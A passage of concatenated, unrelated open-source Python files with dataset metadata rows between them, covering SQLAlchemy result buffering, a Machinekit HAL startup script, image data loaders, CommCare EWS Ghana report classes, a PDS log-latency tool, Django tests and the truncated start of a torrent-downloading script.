Returns None if no row is present.
"""
if self._metadata is None:
self._non_result()
try:
row = self._fetchone_impl()
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
try:
if row is not None:
return self.process_rows([row])[0]
else:
return None
finally:
self.close()
def scalar(self):
"""Fetch the first column of the first row, and close the result set.
Returns None if no row is present.
"""
row = self.first()
if row is not None:
return row[0]
else:
return None
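# --- Illustrative sketch (not part of the original module) -------------------
# A minimal, hypothetical use of the fetch API defined above, assuming an
# `engine` object created elsewhere (e.g. via create_engine()) whose execute()
# call returns a ResultProxy.  It only illustrates how fetchone()/first()/
# scalar() interact with automatic cursor closing; it is not used by SQLAlchemy.
def _example_result_usage(engine):
    result = engine.execute("select 1 as x")
    row = result.fetchone()        # cursor stays open while rows remain
    value = row['x']               # name-based access through RowProxy
    result.close()                 # explicit close releases the DBAPI cursor
    # first()/scalar() close the result unconditionally after one row
    return value, engine.execute("select 2 as y").scalar()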
class BufferedRowResultProxy(ResultProxy):
"""A ResultProxy with row buffering behavior.
``ResultProxy`` that buffers the contents of a selection of rows
before ``fetchone()`` is called. This is to allow the results of
``cursor.description`` to be available immediately, when
interfacing with a DB-API that requires rows to be consumed before
this information is available (currently psycopg2, when used with
server-side cursors).
    The pre-fetching behavior fetches only one row initially, and then
    grows its buffer size according to the ``size_growth`` table below
    with each successive need for additional rows, up to a maximum of 1000.
"""
def _init_metadata(self):
self.__buffer_rows()
super(BufferedRowResultProxy, self)._init_metadata()
# this is a "growth chart" for the buffering of rows.
# each successive __buffer_rows call will use the next
# value in the list for the buffer size until the max
# is reached
size_growth = {
1: 5,
5: 10,
10: 20,
20: 50,
50: 100,
100: 250,
250: 500,
500: 1000
}
def __buffer_rows(self):
size = getattr(self, '_bufsize', 1)
self.__rowbuffer = collections.deque(self.cursor.fetchmany(size))
self._bufsize = self.size_growth.get(size, size)
def _fetchone_impl(self):
if self.closed:
return None
if not self.__rowbuffer:
self.__buffer_rows()
if not self.__rowbuffer:
return None
return self.__rowbuffer.popleft()
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
self.__rowbuffer.extend(self.cursor.fetchall())
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
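# --- Illustrative sketch (not part of the original module) -------------------
# Hypothetical helper that walks the size_growth table above to show how the
# prefetch buffer grows on successive __buffer_rows() calls:
# 1 -> 5 -> 10 -> 20 -> 50 -> 100 -> 250 -> 500 -> 1000, then stays at 1000.
def _example_buffer_growth(steps=10):
    size = 1
    sizes = []
    for _ in range(steps):
        sizes.append(size)
        size = BufferedRowResultProxy.size_growth.get(size, size)
    return sizes   # [1, 5, 10, 20, 50, 100, 250, 500, 1000, 1000]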
class FullyBufferedResultProxy(ResultProxy):
"""A result proxy that buffers rows fully upon creation.
Used for operations where a result is to be delivered
    after the database conversation cannot be continued,
such as MSSQL INSERT...OUTPUT after an autocommit.
"""
def _init_metadata(self):
super(FullyBufferedResultProxy, self)._init_metadata()
self.__rowbuffer = self._buffer_rows()
def _buffer_rows(self):
return collections.deque(self.cursor.fetchall())
def _fetchone_impl(self):
if self.__rowbuffer:
return self.__rowbuffer.popleft()
else:
return None
def _fetchmany_impl(self, size=None):
if size is None:
return self._fetchall_impl()
result = []
for x in range(0, size):
row = self._fetchone_impl()
if row is None:
break
result.append(row)
return result
def _fetchall_impl(self):
ret = self.__rowbuffer
self.__rowbuffer = collections.deque()
return ret
class BufferedColumnRow(RowProxy):
def __init__(self, parent, row, processors, keymap):
# preprocess row
row = list(row)
# this is a tad faster than using enumerate
index = 0
for processor in parent._orig_processors:
if processor is not None:
row[index] = processor(row[index])
index += 1
row = tuple(row)
super(BufferedColumnRow, self).__init__(parent, row,
processors, keymap)
class BufferedColumnResultProxy(ResultProxy):
"""A ResultProxy with column buffering behavior.
``ResultProxy`` that loads all columns into memory each time
fetchone() is called. If fetchmany() or fetchall() are called,
the full grid of results is fetched. This is to operate with
databases where result rows contain "live" results that fall out
of scope unless explicitly fetched. Currently this includes
cx_Oracle LOB objects.
"""
_process_row = BufferedColumnRow
def _init_metadata(self):
super(BufferedColumnResultProxy, self)._init_metadata()
metadata = self._metadata
# orig_processors will be used to preprocess each row when they are
# constructed.
metadata._orig_processors = metadata._processors
        # replace all of the type processors with None processors.
metadata._processors = [None for _ in range(len(metadata.keys))]
keymap = {}
for k, (func, obj, index) in metadata._keymap.items():
keymap[k] = (None, obj, index)
self._metadata._keymap = keymap
def fetchall(self):
# can't call cursor.fetchall(), since rows must be
# fully processed before requesting more from the DBAPI.
l = []
while True:
row = self.fetchone()
if row is None:
break
l.append(row)
return l
def fetchmany(self, size=None):
# can't call cursor.fetchmany(), since rows must be
# fully processed before requesting more from the DBAPI.
if size is None:
return self.fetchall()
l = []
for i in range(size):
row = self.fetchone()
if row is None:
break
l.append(row)
return l
| mit | 7,757,144,335,151,465,000 | 33.582133 | 84 | 0.566028 | false |
strahlex/machinekit | configs/ARM/BeagleBone/Replicape-Stretch/ARM.Replicape.B3/replicape.py | 5 | 1365 | #!/usr/bin/python2
# encoding: utf-8
"""
replicape.py
Machinekit HAL for Replicape Rev B3
Copyright (c) 2016 Sam Wong
Adaptation to Debian Stretch and kernel 4.14.x, extensions as in README.md:
Copyright (c) Karl Jacobs
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from replicape import base
from machinekit import hal
base.init_hardware()
hal.loadusr('haltalk', wait=True)
| lgpl-2.1 | 4,948,745,157,163,811,000 | 51.5 | 460 | 0.791209 | false |
atitus5/MiniPlaces | DataLoader_multi.py | 1 | 9187 | import os
import numpy as np
import scipy.misc
import h5py
import random
np.random.seed(123)
# loading data from .h5
class DataLoaderH5(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
# read data info from lists
f = h5py.File(kwargs['data_h5'], "r")
self.im_set = np.array(f['images'])
self.lab_set = np.array(f['labels'])
self.num = self.im_set.shape[0]
assert self.im_set.shape[0]==self.lab_set.shape[0], '#images and #labels do not match!'
assert self.im_set.shape[2]==self.load_size, 'Image size error!'
assert self.im_set.shape[1]==self.load_size, 'Image size error!'
print('# Images found:', self.num)
print("Shuffling...")
if self.randomize:
self.shuffle()
self._idx = 0
print("DataLoader ready.")
def next_batch_all(self, batch_size):
labels_batch = np.zeros(batch_size*9)
images_batch = np.zeros((batch_size*9, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_batch[9*i+loc_i, ...] = image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[9*i+loc_i, ...] = self.lab_set[self._idx]
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_batch[3+9*i+loc_i, ...] = image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[3+9*i+loc_i, ...] = self.lab_set[self._idx]
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_batch[6+9*i+loc_i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[6+9*i+loc_i, ...] = self.lab_set[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def next_batch_sample(self, batch_size):
labels_batch = np.zeros(batch_size)
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
for i in range(batch_size):
image = self.im_set[self._idx]
image = image.astype(np.float32)/255. - self.data_mean
resize_factor = np.random.random_integers(self.load_size, self.load_size*2)
images_labels = []
image_1 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_1 = image_1.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_1 = image_1[:,::-1,:]
offset_h = np.random.random_integers(0, image_1.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_1.shape[1]-self.fine_size)
images_labels.append((image_1[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
resize_factor = np.random.random_integers(self.fine_size, self.load_size)
image_2 = scipy.misc.imresize(image, (resize_factor, resize_factor))
image_2 = image_2.astype(np.float32)/255. - self.data_mean
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image_2 = image_2[:,::-1,:]
offset_h = np.random.random_integers(0, image_2.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image_2.shape[1]-self.fine_size)
images_labels.append((image_2[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
for loc_i in range(3):
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, image.shape[0]-self.fine_size)
offset_w = np.random.random_integers(0, image.shape[1]-self.fine_size)
images_labels.append((image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :],self.lab_set[self._idx]))
choice = random.choice(images_labels)
images_batch[i, ...] = choice[0]
labels_batch[i, ...] = choice[1]
self._idx += 1
if self._idx == self.num:
self._idx = 0
if self.randomize:
self.shuffle()
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
def shuffle(self):
perm = np.random.permutation(self.num)
self.im_set = self.im_set[perm]
self.lab_set = self.lab_set[perm]
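# --- Illustrative sketch (not part of the original file) ---------------------
# Hypothetical usage of DataLoaderH5; the file name, sizes and mean below are
# placeholders and must match the stored dataset.  Note that next_batch_all()
# returns nine augmented crops per source image (3 rescales x 3 random crops),
# so its output arrays are 9x larger than the requested batch size.
def _example_h5_loader():
    opt = {
        'data_h5': 'miniplaces_train.h5',             # assumed HDF5 file
        'load_size': 256,                             # must equal stored image size
        'fine_size': 224,
        'data_mean': np.asarray([0.45, 0.45, 0.45]),
        'randomize': True,
    }
    loader = DataLoaderH5(**opt)
    images, labels = loader.next_batch_all(8)         # shapes (72, 224, 224, 3), (72,)
    return images.shape, labels.shape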
# Loading data from disk
class DataLoaderDisk(object):
def __init__(self, **kwargs):
self.load_size = int(kwargs['load_size'])
self.fine_size = int(kwargs['fine_size'])
self.data_mean = np.array(kwargs['data_mean'])
self.randomize = kwargs['randomize']
self.data_root = os.path.join(kwargs['data_root'])
# read data info from lists
self.list_im = []
self.list_lab = []
with open(kwargs['data_list'], 'r') as f:
for line in f:
path, lab =line.rstrip().split(' ')
self.list_im.append(os.path.join(self.data_root, path))
self.list_lab.append(int(lab))
self.list_im = np.array(self.list_im, np.object)
self.list_lab = np.array(self.list_lab, np.int64)
self.num = self.list_im.shape[0]
print('# Images found:', self.num)
# permutation
perm = np.random.permutation(self.num)
self.list_im[:, ...] = self.list_im[perm, ...]
self.list_lab[:] = self.list_lab[perm, ...]
self._idx = 0
def next_batch(self, batch_size):
images_batch = np.zeros((batch_size, self.fine_size, self.fine_size, 3))
labels_batch = np.zeros(batch_size)
for i in range(batch_size):
image = scipy.misc.imread(self.list_im[self._idx])
image = scipy.misc.imresize(image, (self.load_size, self.load_size))
image = image.astype(np.float32)/255.
image = image - self.data_mean
if self.randomize:
flip = np.random.random_integers(0, 1)
if flip>0:
image = image[:,::-1,:]
offset_h = np.random.random_integers(0, self.load_size-self.fine_size)
offset_w = np.random.random_integers(0, self.load_size-self.fine_size)
else:
offset_h = (self.load_size-self.fine_size)//2
offset_w = (self.load_size-self.fine_size)//2
images_batch[i, ...] = image[offset_h:offset_h+self.fine_size, offset_w:offset_w+self.fine_size, :]
labels_batch[i, ...] = self.list_lab[self._idx]
self._idx += 1
if self._idx == self.num:
self._idx = 0
return images_batch, labels_batch
def size(self):
return self.num
def reset(self):
self._idx = 0
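# --- Illustrative sketch (not part of the original file) ---------------------
# Hypothetical usage of DataLoaderDisk; the paths and values are placeholders.
# data_list is expected to contain one "relative/path.jpg label" pair per line.
def _example_disk_loader():
    opt = {
        'data_root': 'images/',                       # assumed image directory
        'data_list': 'data/train.txt',                # assumed "path label" list
        'load_size': 256,
        'fine_size': 224,
        'data_mean': np.asarray([0.45, 0.45, 0.45]),
        'randomize': True,
    }
    loader = DataLoaderDisk(**opt)
    images, labels = loader.next_batch(32)            # shapes (32, 224, 224, 3), (32,)
    return images.shape, labels.shape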
| mit | 7,697,863,647,594,161,000 | 40.949772 | 142 | 0.534669 | false |
benrudolph/commcare-hq | custom/ewsghana/reports/__init__.py | 1 | 11687 | from datetime import datetime
from django.core.urlresolvers import reverse
from django.db.models import Q
from corehq import Domain
from corehq.apps.programs.models import Program
from corehq.apps.reports.commtrack.standard import CommtrackReportMixin
from corehq.apps.reports.filters.dates import DatespanFilter
from corehq.apps.reports.filters.fixtures import AsyncLocationFilter
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.graph_models import LineChart, MultiBarChart
from corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin, DatespanMixin
from custom.ewsghana.filters import ProductByProgramFilter
from dimagi.utils.decorators.memoized import memoized
from corehq.apps.locations.models import Location, SQLLocation
from custom.ewsghana.utils import get_supply_points
from casexml.apps.stock.models import StockTransaction
def get_url(view_name, text, domain):
return '<a href="%s">%s</a>' % (reverse(view_name, args=[domain]), text)
def get_url_with_location(view_name, text, location_id, domain):
return '<a href="%s?location_id=%s">%s</a>' % (reverse(view_name, args=[domain]), location_id, text)
class EWSLineChart(LineChart):
template_partial = 'ewsghana/partials/ews_line_chart.html'
class EWSMultiBarChart(MultiBarChart):
template_partial = 'ewsghana/partials/ews_multibar_chart.html'
class EWSData(object):
show_table = False
show_chart = False
title = ''
slug = ''
use_datatables = False
def __init__(self, config=None):
self.config = config or {}
super(EWSData, self).__init__()
def percent_fn(self, x, y):
return "%(p).2f%%" % \
{
"p": (100 * float(y or 0) / float(x or 1))
}
@property
def headers(self):
return []
@property
def location_id(self):
return self.config.get('location_id')
@property
def location(self):
location_id = self.location_id
if not location_id:
return None
return SQLLocation.objects.get(location_id=location_id)
@property
def rows(self):
raise NotImplementedError
@property
def domain(self):
return self.config.get('domain')
@memoized
def reporting_types(self):
return [
location_type.name
for location_type in Domain.get_by_name(self.domain).location_types
if not location_type.administrative
]
@property
def sublocations(self):
location = Location.get(self.config['location_id'])
if location.children:
return location.children
else:
return [location]
def unique_products(self, locations, all=False):
products = list()
for loc in locations:
if self.config['products'] and not all:
products.extend([p for p in loc.products if p.product_id in self.config['products'] and
not p.is_archived])
elif self.config['program'] and not all:
products.extend([p for p in loc.products if p.program_id == self.config['program'] and
not p.is_archived])
else:
products.extend(p for p in loc.products if not p.is_archived)
return sorted(set(products), key=lambda p: p.code)
class ReportingRatesData(EWSData):
def get_supply_points(self, location_id=None):
location = SQLLocation.objects.get(location_id=location_id) if location_id else self.location
location_types = self.reporting_types()
if location.location_type.name == 'district':
locations = SQLLocation.objects.filter(parent=location)
elif location.location_type.name == 'region':
locations = SQLLocation.objects.filter(
Q(parent__parent=location) | Q(parent=location, location_type__name__in=location_types)
)
elif location.location_type in location_types:
locations = SQLLocation.objects.filter(id=location.id)
else:
locations = SQLLocation.objects.filter(
domain=self.domain,
location_type__name__in=location_types,
parent=location
)
return locations.exclude(supply_point_id__isnull=True).exclude(is_archived=True)
def supply_points_list(self, location_id=None):
return self.get_supply_points(location_id).values_list('supply_point_id')
def reporting_supply_points(self, supply_points=None):
all_supply_points = self.get_supply_points().values_list('supply_point_id', flat=True)
supply_points = supply_points if supply_points else all_supply_points
return StockTransaction.objects.filter(
case_id__in=supply_points,
report__date__range=[self.config['startdate'], self.config['enddate']]
).distinct('case_id').values_list('case_id', flat=True)
def datetext(self):
today = datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
return "last %d days" % (today - self.config['startdate']).days if today == self.config['enddate'] else\
"%s to %s" % (self.config['startdate'].strftime("%Y-%m-%d"),
self.config['enddate'].strftime("%Y-%m-%d"))
@memoized
def all_reporting_locations(self):
return SQLLocation.objects.filter(
domain=self.domain, location_type__name__in=self.reporting_types(), is_archived=False
).values_list('supply_point_id', flat=True)
class MultiReport(CustomProjectReport, CommtrackReportMixin, ProjectReportParametersMixin, DatespanMixin):
title = ''
report_template_path = "ewsghana/multi_report.html"
flush_layout = True
split = True
exportable = True
is_exportable = False
base_template = 'ewsghana/base_template.html'
@classmethod
def get_url(cls, domain=None, render_as=None, **kwargs):
url = super(MultiReport, cls).get_url(domain=domain, render_as=None, kwargs=kwargs)
request = kwargs.get('request')
user = getattr(request, 'couch_user', None)
if user:
dm = user.get_domain_membership(domain)
if dm.program_id:
program_id = dm.program_id
else:
program_id = 'all'
url = '%s?location_id=%s&filter_by_program=%s' % (
url,
dm.location_id if dm.location_id else '',
program_id if program_id else ''
)
return url
@property
@memoized
def rendered_report_title(self):
return self.title
@property
@memoized
def data_providers(self):
return []
@property
def report_config(self):
return dict(
domain=self.domain,
startdate=self.datespan.startdate,
enddate=self.datespan.enddate,
location_id=self.request.GET.get('location_id'),
)
def report_filters(self):
return [f.slug for f in self.fields]
def fpr_report_filters(self):
return [f.slug for f in [AsyncLocationFilter, ProductByProgramFilter, DatespanFilter]]
@property
def report_context(self):
context = {
'reports': [self.get_report_context(dp) for dp in self.data_providers],
'title': self.title,
'split': self.split,
'r_filters': self.report_filters(),
'fpr_filters': self.fpr_report_filters(),
'exportable': self.is_exportable,
'location_id': self.request.GET.get('location_id'),
}
return context
def get_report_context(self, data_provider):
total_row = []
headers = []
rows = []
if not self.needs_filters and data_provider.show_table:
headers = data_provider.headers
rows = data_provider.rows
context = dict(
report_table=dict(
title=data_provider.title,
slug=data_provider.slug,
headers=headers,
rows=rows,
total_row=total_row,
start_at_row=0,
use_datatables=data_provider.use_datatables,
),
show_table=data_provider.show_table,
show_chart=data_provider.show_chart,
charts=data_provider.charts if data_provider.show_chart else [],
chart_span=12,
)
return context
def is_reporting_type(self):
if not self.report_config.get('location_id'):
return False
sql_location = SQLLocation.objects.get(location_id=self.report_config['location_id'], is_archived=False)
reporting_types = [
location_type.name
for location_type in Domain.get_by_name(self.domain).location_types
if not location_type.administrative
]
return sql_location.location_type.name in reporting_types
@property
def export_table(self):
r = self.report_context['reports'][0]['report_table']
return [self._export_table(r['title'], r['headers'], r['rows'])]
# Export for Facility Page Report, which occurs in every multireport
def _export_table(self, export_sheet_name, headers, formatted_rows, total_row=None):
def _unformat_row(row):
return [col.get("sort_key", col) if isinstance(col, dict) else col for col in row]
table = headers.as_export_table
rows = [_unformat_row(row) for row in formatted_rows]
# Removing html icon tag from MOS column
for row in rows:
row[1] = GenericTabularReport._strip_tags(row[1])
replace = ''
for k, v in enumerate(table[0]):
if v != ' ':
replace = v
else:
table[0][k] = replace
table.extend(rows)
if total_row:
table.append(_unformat_row(total_row))
return [export_sheet_name, table]
class ProductSelectionPane(EWSData):
slug = 'product_selection_pane'
show_table = True
title = 'Select Products'
use_datatables = True
@property
def rows(self):
locations = get_supply_points(self.config['location_id'], self.config['domain'])
products = self.unique_products(locations, all=True)
programs = {program.get_id: program.name for program in Program.by_domain(self.domain)}
headers = []
if 'report_type' in self.config:
from custom.ewsghana.reports.specific_reports.stock_status_report import MonthOfStockProduct
headers = [h.html for h in MonthOfStockProduct(self.config).headers]
result = [
[
'<input class=\"toggle-column\" name=\"{1} ({0})\" data-column={2} value=\"{0}\" type=\"checkbox\"'
'{3}>{1} ({0})</input>'.format(
p.code, p.name, idx if not headers else headers.index(p.code) if p.code in headers else -1,
'checked' if self.config['program'] is None or self.config['program'] == p.program_id else ''),
programs[p.program_id], p.code
] for idx, p in enumerate(products, start=1)
]
result.sort(key=lambda r: (r[1], r[2]))
current_program = result[0][1] if result else ''
rows = [['<div class="program">%s</div>' % current_program]]
for r in result:
if r[1] != current_program:
rows.append(['<div class="program">%s</div>' % r[1]])
current_program = r[1]
rows.append([r[0]])
return rows
| bsd-3-clause | -9,058,818,260,958,323,000 | 35.636364 | 115 | 0.608967 | false |
khosrow/metpx | sundew/lib/PDSLatencies.py | 1 | 7398 | #!/usr/bin/env python
"""
MetPX Copyright (C) 2004-2006 Environment Canada
MetPX comes with ABSOLUTELY NO WARRANTY; For details type see the file
named COPYING in the root of the source directory tree.
"""
"""
#############################################################################################
# Name: PDSLatencies
#
# Author: Daniel Lemay
#
# Date: 2005-09-13
#
# Description: Calculate latencies for a product (MPCN for example) sent to
# a PDS client (wxo-b1 for example)
#
#############################################################################################
"""
import sys, os, os.path, commands, fnmatch
import PXPaths, dateLib
from Latencies import Latencies
class PDSLatencies(Latencies):
def __init__(self, nopull=False, keep=False, date=None, pattern='ACC', machines=['pds1', 'pds2', 'pds3', 'pds4'], sources=['pdschkprod'], client='wxo-b1-oper-ww', xstats=False):
Latencies.__init__(self, nopull, keep, date, xstats) # Parent Constructor
self.pattern = pattern # Products that we want to match
        self.machines = machines # Machines where the logs can be found
self.sources = sources # Sources for which we will check arrival time of the products
self.client = client # Client for which we will check delivery time of the products (ONLY ONE ENTRY in the list)
self.system = 'PDS'
if not self.nopull:
self.obtainFiles()
self.start()
if not self.keep:
self.eraseFiles()
def obtainFiles(self):
date = self.date
# Used for xferlog
(dummy, month, day) = dateLib.getISODateParts(date)
if day[0] == '0':
day = ' ' + day[1]
monthAbbrev = dateLib.getMonthAbbrev(month)
LOG = '/apps/pds/log/'
for machine in self.machines:
self.manager.createDir(PXPaths.LAT_TMP + machine + '_' + self.random)
for source in self.sources:
command = 'scp -q %s:%s %s' % (machine, LOG + source + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
command = 'scp -q %s:%s %s' % (machine, LOG + self.client + '.' + date, PXPaths.LAT_TMP + machine + '_' + self.random)
(status, output) = commands.getstatusoutput(command)
# xferlog data
if self.xstats:
command = "ssh %s grep -h -e \"'%s %s'\" /var/log/xferlog /var/log/xferlog.?" % (machine, monthAbbrev, day)
(status, output) = commands.getstatusoutput(command)
xferlog = open(PXPaths.LAT_TMP + machine + '_' + self.random + '/xferlog_paplat', 'w')
xferlog.write(output)
xferlog.close()
def extractGoodLines(self, prefix, good):
date = self.date
for machine in self.machines:
hostOnly = machine.split('.')[0]
lines = []
xferlogLines = []
dirPath = PXPaths.LAT_TMP + machine + '_' + self.random
try:
files = os.listdir(dirPath)
except OSError:
print "%s doesn't exist!\nDon't use -n|--nopull option if you don't have some data." % dirPath
sys.exit(1)
if prefix == 'rx':
for file in [x for x in files if x == 'pdschkprod.%s' % (date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.xstats:
for file in [x for x in files if x == 'xferlog_paplat']:
xferlogLines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*')))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), xferlogLines))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, '*Written*%s*' % (self.pattern))))
if self.xstats:
self.goodXferlog.extend(map(lambda x: (x, hostOnly), fnmatch.filter(xferlogLines, '*%s*' % (self.pattern))))
if prefix == 'tx':
for file in [x for x in files if x == '%s.%s' % (self.client, date)]:
lines.extend(open(dirPath + '/' + file).readlines())
if self.pattern == '__ALL__':
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*sent to*')))
else:
good.extend(map(lambda x: (x, hostOnly), fnmatch.filter(lines, 'INFO*%s*sent to*' % (self.pattern))))
def extractInfos(self, prefix, good, infos):
if prefix == 'rx':
#print("GOOD RX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918000030
filename_parts = os.path.split(parts[9])[1].split(':')
filename = ':'.join(filename_parts[:-2])
else:
filename = os.path.split(parts[9])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodRx = []
# xferlog stuff
for (line, machine) in self.goodXferlog:
parts = line.split()
hhmmss = parts[3]
date = '%s %s' % (self.dateDashed, hhmmss)
filename = os.path.split(parts[8])[1]
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
self.xferlogInfos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
self.goodXferlog = []
if prefix == 'tx':
#print("GOOD TX: %i" % len(good))
for (line, machine) in good:
parts = line.split()
hhmmss = parts[3][:-1]
date = '%s %s' % (self.dateDashed, hhmmss)
if self.xstats:
# Remove ::20050918020123:pds4
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-3])
else:
# Only remove machine name
filename_parts = parts[7].split(':')
filename = ':'.join(filename_parts[:-1])
#print (date, dateLib.getSecondsSinceEpoch(date), filename, machine)
infos[filename] = (date, dateLib.getSecondsSinceEpoch(date), machine)
#print len(infos)
self.goodTx = []
"""
print "*************************************** RX ********************************"
for tuple in self.goodRx:
print (tuple[0].strip(), tuple[1])
print "*************************************** TX ********************************"
for tuple in self.goodTx:
print (tuple[0].strip(), tuple[1])
"""
if __name__ == '__main__':
latencier = PDSLatencies()
| gpl-2.0 | -795,901,474,159,940,700 | 42.011628 | 181 | 0.499594 | false |
CodeYellowBV/django-binder | tests/test_set_nullable_relation.py | 1 | 2202 | from binder.exceptions import BinderValidationError
from binder.router import Router
from binder.views import ModelView
from .testapp.views import AnimalView
from .testapp.models import Animal, Caretaker
from django.test import TestCase
class TestSetNullableRelations(TestCase):
def test_standard_filling_in_relation_to_existing_model(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
    def test_filling_in_relation_to_existing_model_after_evaluation(self):
animal = Animal.objects.create(name='foo')
caretaker = Caretaker.objects.create(name='bar')
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
assert animal.caretaker is None
animal_view._store(animal, {'caretaker': caretaker.pk}, FakeRequest())
self.assertEqual(animal.caretaker, caretaker)
def test_setting_none_existing_caretaker_gives_validation_error(self):
animal = Animal.objects.create(name='foo', caretaker=Caretaker.objects.create(name='bar2'))
animal_view = AnimalView()
class FakeUser:
def has_perm(self, perm):
return True
class FakeRequest:
user = FakeUser()
GET = {}
router = Router()
router.register(AnimalView)
animal_view.router = router
animal.caretaker
with self.assertRaises(BinderValidationError):
animal_view._store(animal, {'caretaker': -1}, FakeRequest())
| mit | 7,358,221,550,644,352,000 | 26.185185 | 99 | 0.624886 | false |
jonDel/torrents_manager | example.py | 1 | 4439 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import config,re,time
from tpb import TPB
from tpb import CATEGORIES, ORDERS
import OpenSubtitles
import logging
import gzip, os
import transmissionrpc
logging.basicConfig(level=logging.DEBUG)
uploaders = config.ConfigSectionMap("torrent_uploaders")
episode = config.ConfigSectionMap("series")['supernatural']
print "episode is "+episode
down_dir = config.ConfigSectionMap("dir")['series_dir']
print "down_dir is "+down_dir
def return_torrent_name(torrent_name):
torrent= re.search('s([0-2][0-9])e([0-2][0-9]).*(720|1080)', torrent_name, re.I)
ret = {}
try:
torrent_season = torrent.group(1)
torrent_episode = torrent.group(2)
try:
torrent.group(3)
ret = {'is_valid':True,'hd_quality':True,'season':torrent_season,'episode':torrent_episode}
except:
            #print 'No HD-quality torrent available'
ret = {'is_valid':True,'hd_quality':False,'season':torrent_season,'episode':torrent_episode}
except:
